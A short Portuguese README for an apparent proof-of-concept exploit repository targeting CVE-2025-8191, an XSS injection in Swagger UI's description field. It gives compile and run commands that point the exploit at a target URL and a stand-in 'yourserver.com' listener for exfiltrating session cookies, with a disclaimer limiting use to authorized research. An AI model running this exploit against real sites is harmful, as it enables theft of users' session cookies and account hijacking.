
Um repositório contendo um PoC exploit para CVE‑2025‑8191 no Swagger UI, utilizando injeção XSS para exfiltrar cookies de sessão.
Este repositório contém um exploit de Prova‑de‑Conceito (PoC) para o CVE‑2025‑8191, uma vulnerabilidade encontrada no Swagger UI.
A vulnerabilidade permite injeção de Cross‑Site Scripting (XSS) no campo “description”, levando à execução remota de scripts em versões do Swagger UI ≤ 1.0.3.
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
Substitua http://target.com pela URL do Swagger UI alvo e http://yourserver.com pelo seu listener HTTP para exfiltração.
Este código é apenas para fins educacionais e de pesquisa em segurança. NÃO o utilize em sistemas para os quais você não tenha permissão explícita. O autor não é responsável por qualquer uso indevido.
Licença MIT